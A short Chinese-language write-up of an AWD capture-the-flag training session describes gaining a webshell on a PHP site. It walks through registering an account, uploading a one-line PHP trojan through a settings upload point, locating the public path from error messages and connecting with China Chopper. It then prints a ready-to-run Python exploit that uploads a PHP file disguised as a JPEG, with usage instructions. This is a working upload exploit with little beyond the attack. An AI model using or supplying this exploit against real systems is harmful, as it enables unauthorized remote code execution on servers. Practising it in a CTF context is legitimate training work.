前言
awd小组的第一次训练
0x01
首先看一下主界面
使用的应该是PHP模板,随便翻一下找到一个注册界面
随便注册一个用户,登陆后在设置里找到一个上传点
上传我们的一句话木马
查看返回包,上传成功
访问失败,猜测返回路径可能不是绝对路径
通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success!
菜刀连接
0x02
换个思路,网站应该是开源的,百度搜一下关键词,找到一个 payload
#!/usr/bin/python
#-*- coding: UTF-8 -*-
#Author:Bypass
#Date:2018.03.01
import requests
import sys
def CLPHP_upload(url):
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' ,
'X-Requested-With': 'XMLHttpRequest',}
geturl = url+"/user/upFiles/upload"
files ={'file':('1.php',open('1.php','rb'),'image/jpeg')}
res = requests.post(geturl, files=files,headers=header)
print res.text
if __name__ == "__main__":
if len(sys.argv) == 2:
url=sys.argv[1]
CLPHP_upload(url)
sys.exit(0)
else:
print ("usage: %s xxx.com " % sys.argv[0])
sys.exit(-1)
使用方法:把payload.py和一句话.php放到同一文件夹下,
cmd执行 python payload.py url
